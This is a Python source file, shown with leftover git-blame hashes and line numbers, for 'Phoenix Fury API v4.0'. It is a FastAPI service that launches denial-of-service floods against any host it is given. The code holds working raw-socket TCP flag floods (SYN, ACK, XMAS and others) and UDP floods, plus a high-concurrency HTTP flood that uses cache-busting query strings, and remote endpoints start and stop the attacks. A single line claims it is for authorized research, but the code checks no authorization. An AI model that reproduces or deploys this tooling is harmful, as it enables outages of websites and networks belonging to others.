File size: 17,823 Bytes
9cb507d
d166ead
9cb507d
d166ead
 
 
 
 
 
 
 
 
 
9cb507d
d166ead
9cb507d
 
 
 
 
 
 
 
 
 
 
 
 
 
d166ead
9900bc1
9cb507d
 
d166ead
 
9cb507d
 
 
 
 
d166ead
9cb507d
d166ead
 
 
9cb507d
 
d166ead
 
 
9cb507d
d166ead
 
 
9cb507d
9900bc1
9cb507d
 
 
 
9900bc1
 
9cb507d
d166ead
 
9900bc1
 
 
 
 
d166ead
9900bc1
 
d166ead
9cb507d
 
 
 
d166ead
 
 
9900bc1
9cb507d
 
d166ead
9cb507d
9900bc1
 
 
 
9cb507d
 
9900bc1
9cb507d
d166ead
 
 
 
9900bc1
 
d166ead
9900bc1
 
 
 
 
d166ead
9900bc1
 
d166ead
 
9900bc1
 
d166ead
9900bc1
d166ead
9900bc1
 
d166ead
 
9900bc1
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
d166ead
9900bc1
 
 
 
 
 
 
 
 
 
9cb507d
d166ead
9cb507d
 
 
 
d166ead
9cb507d
 
d166ead
9900bc1
9cb507d
9900bc1
9cb507d
d166ead
9cb507d
9900bc1
9cb507d
 
 
d166ead
9cb507d
 
9900bc1
9cb507d
 
d166ead
 
 
 
9cb507d
 
 
d166ead
9cb507d
 
d166ead
9cb507d
d166ead
 
9cb507d
d166ead
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
9cb507d
d166ead
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
9cb507d
 
 
 
 
 
9900bc1
d166ead
9900bc1
 
 
 
 
 
d166ead
 
 
 
 
 
 
 
9cb507d
 
d166ead
 
9cb507d
 
9900bc1
d166ead
 
9900bc1
 
 
d166ead
 
9900bc1
9cb507d
9900bc1
d166ead
 
 
 
 
9cb507d
 
 
d166ead
9cb507d
 
d166ead
 
9cb507d
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
# ====================================================================================
#  PHOENIX FURY API v4.0 - TITAN CLASS
#
#  - RE-ARCHITECTED: Employs a thread-safe Singleton AttackManager to completely
#    eliminate race conditions and ensure stable, consecutive attacks.
#  - RELIABLE LIFECYCLE: Correctly uses FastAPI's BackgroundTasks for the
#    entire attack lifecycle (start -> wait -> stop), guaranteeing accurate durations.
#  - HTTPS/SSL SUPPORT: L7 worker now intelligently detects secure ports (443)
#    and automatically uses HTTPS, fixing the critical bug of no requests on SSL.
#  - MAXIMUM PERFORMANCE: Retains the high-speed shared memory counter and
#    uvloop event loop for state-of-the-art PPS/RPS throughput.
#  - RESILIENT & ROBUST: Enhanced process cleanup, clearer logging, and a
#    state machine that prevents any overlap between attack runs.
#
#  *** The definitive, stable, and most powerful version. ***
# ====================================================================================

import socket
import struct
import random
import time
import multiprocessing
import threading
import asyncio
import aiohttp
import os
import sys
import psutil
import uvloop
from typing import Literal, Optional, List, Union
from ctypes import c_ulonglong

# FastAPI & Pydantic
from fastapi import FastAPI, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field
import uvicorn

# Apply uvloop for a faster asyncio event loop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

# --- Application Setup ---
app = FastAPI(
    title="🔥 Phoenix Fury API v4.0 - Titan Class",
    description="An exceptionally powerful and stable L4/L7 stress testing tool for authorized security research. Re-architected for maximum performance and reliability.",
    version="4.0.0"
)

# --- Constants & Configuration ---
CPU_COUNT = psutil.cpu_count(logical=True)
STATS_BATCH_UPDATE_SIZE = 1000  # Worker process updates global counter after this many packets
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0",
]
HTTP_HEADERS = {"Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}

# ====================================================================================
#  Pydantic API Models
# ====================================================================================
class BaseAttackConfig(BaseModel):
    target: str = Field(..., description="Target hostname or IP address")
    port: int = Field(..., ge=1, le=65535, description="Target port")
    duration: int = Field(..., ge=10, le=7200, description="Attack duration in seconds")
    processes: int = Field(CPU_COUNT, ge=1, le=CPU_COUNT * 16, description=f"Number of processes. Defaults to {CPU_COUNT}.")

class L4TCPConfig(BaseAttackConfig):
    method: Literal["syn", "ack", "fin", "rst", "psh", "urg", "xmas"] = Field("syn", description="TCP flag")

class L4UDPConfig(BaseAttackConfig):
    payload_size: int = Field(1024, ge=0, le=1472, description="Size of UDP payload in bytes.")

class L7Config(BaseAttackConfig):
    concurrency_per_process: int = Field(1024, ge=1, le=16384, description="Concurrent async tasks per process.")
    method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
    path: str = Field("/", description="Request path")

class StatusResponse(BaseModel):
    attack_active: bool; attack_type: str; target_host: str; target_ip: str
    port: int; duration: int; elapsed_time: float; processes: int
    total_sent: int; current_rate_pps_rps: float
    cpu_usage_percent: float; memory_usage_percent: float

# ====================================================================================
#  Core Networking & Utils
# ====================================================================================
def check_root() -> bool:
    try: return os.geteuid() == 0
    except AttributeError: import ctypes; return ctypes.windll.shell32.IsUserAnAdmin() != 0

def resolve_target(target: str) -> str:
    try:
        if "://" in target: target = target.split("://")[1].split("/")[0]
        return socket.gethostbyname(target)
    except socket.gaierror: raise ValueError(f"Could not resolve hostname: {target}")

def get_local_ip(target_ip: str) -> str:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((target_ip, 1)); ip = s.getsockname()[0]; s.close(); return ip

def calculate_checksum(data: bytes) -> int:
    s = 0
    if len(data) % 2: data += b'\0'
    for i in range(0, len(data), 2): s += (data[i] << 8) + data[i+1]
    s = (s >> 16) + (s & 0xffff); s += (s >> 16); return (~s) & 0xffff

# ====================================================================================
#  ATTACK WORKER PROCESSES (L4 & L7)
# ====================================================================================

# --- Layer 4 Worker ---
def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type, method_details):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        local_ip = get_local_ip(target_ip)
    except Exception as e:
        print(f"[PID {os.getpid()}] L4 Worker Error: {e}", file=sys.stderr)
        return

    local_counter = 0
    ip_header_base = struct.pack('!BBHHHBBH4s4s', 69, 0, 0, 1, 0, 64, 0, 0, socket.inet_aton(local_ip), socket.inet_aton(target_ip))
    
    if attack_type == 'tcp':
        flag_map = {"syn": 2, "ack": 16, "fin": 1, "rst": 4, "psh": 8, "urg": 32, "xmas": 41}
        flags = flag_map.get(method_details, 2)
    else: # udp
        payload = os.urandom(method_details)

    while not stop_event.is_set():
        src_port = random.randint(1025, 65535)
        if attack_type == 'tcp':
            ip_header = ip_header_base[:6] + (socket.IPPROTO_TCP,).to_bytes(1, 'big') + ip_header_base[7:]
            tcp_header = struct.pack('!HHLLBBHHH', src_port, port, random.randint(1, 9999999), 0, 80, flags, 5840, 0, 0)
            pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(local_ip), socket.inet_aton(target_ip), 0, socket.IPPROTO_TCP, len(tcp_header))
            checksum = calculate_checksum(pseudo_header + tcp_header)
            tcp_header = tcp_header[:16] + struct.pack('!H', checksum) + tcp_header[18:]
            packet = ip_header + tcp_header
        else: # udp
            ip_header = ip_header_base[:6] + (socket.IPPROTO_UDP,).to_bytes(1, 'big') + ip_header_base[7:]
            udp_header = struct.pack('!HHHH', src_port, port, 8 + method_details, 0)
            packet = ip_header + udp_header + payload
        
        sock.sendto(packet, (target_ip, 0))
        local_counter += 1
        if local_counter >= STATS_BATCH_UPDATE_SIZE:
            with shared_counter.get_lock(): shared_counter.value += local_counter
            local_counter = 0
    if local_counter > 0:
        with shared_counter.get_lock(): shared_counter.value += local_counter
    sock.close()

# --- Layer 7 Worker ---
async def l7_task(session, url, method, stop_event, shared_counter):
    local_counter = 0
    while not stop_event.is_set():
        try:
            async with session.request(method, f"{url}?{random.randint(1, 99999999)}", ssl=False):
                local_counter += 1
        except Exception:
            local_counter += 1
        finally:
            if local_counter >= STATS_BATCH_UPDATE_SIZE:
                with shared_counter.get_lock(): shared_counter.value += local_counter
                local_counter = 0
            await asyncio.sleep(0)
    if local_counter > 0:
        with shared_counter.get_lock(): shared_counter.value += local_counter

async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
    headers = {**HTTP_HEADERS, "User-Agent": random.choice(USER_AGENTS)}
    connector = aiohttp.TCPConnector(limit=None, force_close=False)
    timeout = aiohttp.ClientTimeout(total=10, connect=5)
    async with aiohttp.ClientSession(connector=connector, headers=headers, timeout=timeout) as session:
        tasks = [l7_task(session, url, method, stop_event, shared_counter) for _ in range(concurrency)]
        await asyncio.gather(*tasks)

def l7_worker_process(stop_event, shared_counter, target_ip, port, path, method, concurrency):
    # CRITICAL FIX: Determine protocol based on port for HTTPS support
    protocol = "https" if port in [443, 8443, 4433] else "http"
    url = f"{protocol}://{target_ip}:{port}{path}"
    try:
        asyncio.run(l7_worker_main(url, method, concurrency, stop_event, shared_counter))
    except Exception as e:
        print(f"[PID {os.getpid()}] L7 Worker Error: {e}", file=sys.stderr)

# ====================================================================================
#  CENTRALIZED ATTACK MANAGER (SINGLETON)
# ====================================================================================
class AttackManager:
    _instance = None
    
    def __new__(cls):
        if cls._instance is None:
            cls._instance = super(AttackManager, cls).__new__(cls)
            cls._instance._initialized = False
        return cls._instance

    def __init__(self):
        if self._initialized: return
        self._initialized = True
        self.lock = threading.Lock()
        self.stats_thread = None
        self._reset_state()

    def _reset_state(self):
        self.attack_active = False
        self.attack_type = "None"
        self.target_host = "None"
        self.target_ip = "None"
        self.port = 0
        self.duration = 0
        self.start_time = 0.0
        self.process_count = 0
        self.processes: List[multiprocessing.Process] = []
        self.stop_event = multiprocessing.Event()
        self.counter = multiprocessing.Value(c_ulonglong, 0)
        self.current_rate = 0.0

    def is_active(self):
        with self.lock:
            return self.attack_active

    def _stats_calculator(self):
        last_check_time = time.time()
        last_count = 0
        while not self.stop_event.is_set():
            time.sleep(1)
            now = time.time()
            current_count = self.counter.value
            elapsed = now - last_check_time
            if elapsed > 0:
                self.current_rate = (current_count - last_count) / elapsed
            last_check_time = now
            last_count = current_count
        self.current_rate = 0.0

    def start(self, config: Union[L7Config, L4TCPConfig, L4UDPConfig], family: str):
        with self.lock:
            if self.attack_active:
                print("Start aborted: An attack is already in progress.")
                return

            try:
                self.target_host = config.target
                self.target_ip = resolve_target(self.target_host)
                if family == 'l4' and not check_root():
                    raise PermissionError("Layer 4 attacks require root/administrator privileges.")
            except (ValueError, PermissionError) as e:
                print(f"Attack validation failed: {e}", file=sys.stderr)
                self._reset_state()
                return

            self.attack_active = True
            self.port = config.port
            self.duration = config.duration
            self.process_count = config.processes
            self.start_time = time.time()
            
            worker_target, worker_args, attack_name = (None, None, "Unknown")
            if family == 'l7' and isinstance(config, L7Config):
                attack_name = f"L7-{config.method.upper()}"
                worker_target = l7_worker_process
                worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.method, config.concurrency_per_process)
            elif family == 'l4':
                if isinstance(config, L4TCPConfig):
                    attack_name = f"L4-TCP-{config.method.upper()}"
                    worker_target = l4_worker_process
                    worker_args = (self.stop_event, self.counter, self.target_ip, config.port, 'tcp', config.method)
                elif isinstance(config, L4UDPConfig):
                    attack_name = "L4-UDP"
                    worker_target = l4_worker_process
                    worker_args = (self.stop_event, self.counter, self.target_ip, config.port, 'udp', config.payload_size)

            self.attack_type = attack_name
            
            print("="*60)
            print(f"🔥 PHOENIX FURY TITAN - ATTACK SEQUENCE INITIATED 🔥")
            print(f"   Type: {self.attack_type} | Target: {self.target_host}:{self.port} ({self.target_ip})")
            print(f"   Duration: {self.duration}s | Processes: {self.process_count}")
            print("="*60)

            for _ in range(self.process_count):
                p = multiprocessing.Process(target=worker_target, args=worker_args)
                self.processes.append(p)
                p.start()

            self.stats_thread = threading.Thread(target=self._stats_calculator)
            self.stats_thread.start()

    def stop(self):
        with self.lock:
            if not self.attack_active:
                return

            print(f"\nDuration of {self.duration}s reached. Sending stop signal to {len(self.processes)} processes...")
            self.stop_event.set()
            
            # Wait for processes to terminate
            for p in self.processes:
                p.join(timeout=5)
            
            # Forcefully terminate any stubborn processes
            for p in self.processes:
                if p.is_alive():
                    print(f"Terminating hanging process PID: {p.pid}")
                    p.terminate()

            if self.stats_thread:
                self.stats_thread.join(timeout=2)

            elapsed = time.time() - self.start_time
            total_sent = self.counter.value
            avg_rate = total_sent / elapsed if elapsed > 0 else 0

            print("="*40)
            print("✅ ATTACK TERMINATED.")
            print(f"   Total Sent: {total_sent:,}")
            print(f"   Elapsed Time: {elapsed:.2f} seconds")
            print(f"   Average Rate: {avg_rate:,.2f} PPS/RPS")
            print("="*40)

            self._reset_state()

    def get_status(self) -> StatusResponse:
        with self.lock:
            return StatusResponse(
                attack_active=self.attack_active,
                attack_type=self.attack_type,
                target_host=self.target_host,
                target_ip=self.target_ip,
                port=self.port,
                duration=self.duration,
                elapsed_time=round(time.time() - self.start_time, 2) if self.attack_active else 0,
                processes=self.process_count,
                total_sent=self.counter.value,
                current_rate_pps_rps=round(self.current_rate, 2),
                cpu_usage_percent=psutil.cpu_percent(),
                memory_usage_percent=psutil.virtual_memory().percent
            )

MANAGER = AttackManager()

# ====================================================================================
#  FASTAPI ENDPOINTS
# ====================================================================================
@app.on_event("startup")
def on_startup():
    print("="*50)
    print("🔥 Phoenix Fury API v4.0 - Titan Class is ready.")
    if check_root():
        print("✅ Running with root privileges. Layer 4 attacks are ENABLED.")
    else:
        print("⚠️ WARNING: Not running with root privileges. Layer 4 attacks will FAIL.")
    print("="*50)

def run_attack_lifecycle(config: Union[L7Config, L4TCPConfig, L4UDPConfig], family: str, background_tasks: BackgroundTasks):
    if MANAGER.is_active():
        raise HTTPException(status_code=409, detail="An attack is already in progress. Please stop the current attack or wait for it to complete.")
    
    # The correct way to run a start->wait->stop sequence
    background_tasks.add_task(MANAGER.start, config, family)
    background_tasks.add_task(time.sleep, config.duration)
    background_tasks.add_task(MANAGER.stop)

@app.post("/attack/layer7")
def api_start_l7(config: L7Config, background_tasks: BackgroundTasks):
    run_attack_lifecycle(config, 'l7', background_tasks)
    return {"status": "success", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"}

@app.post("/attack/layer4/tcp")
def api_start_l4_tcp(config: L4TCPConfig, background_tasks: BackgroundTasks):
    run_attack_lifecycle(config, 'l4', background_tasks)
    return {"status": "success", "message": f"L4 TCP-{config.method.upper()} attack initiated on {config.target}:{config.port}"}

@app.post("/attack/layer4/udp")
def api_start_l4_udp(config: L4UDPConfig, background_tasks: BackgroundTasks):
    run_attack_lifecycle(config, 'l4', background_tasks)
    return {"status": "success", "message": f"L4 UDP attack initiated on {config.target}:{config.port}"}

@app.post("/attack/stop")
def api_stop_attack():
    if not MANAGER.is_active():
        return {"status": "info", "message": "No attack is currently running."}
    MANAGER.stop()
    return {"status": "success", "message": "Stop signal sent. Attack is terminating."}

@app.get("/status", response_model=StatusResponse)
def get_status():
    return MANAGER.get_status()

@app.get("/")
def root():
    return {"message": "🔥 Phoenix Fury API v4.0 - Titan Class", "docs": "/docs"}

# --- Main Execution ---
if __name__ == "__main__":
    multiprocessing.freeze_support()
    uvicorn.run(app, host="0.0.0.0", port=8000)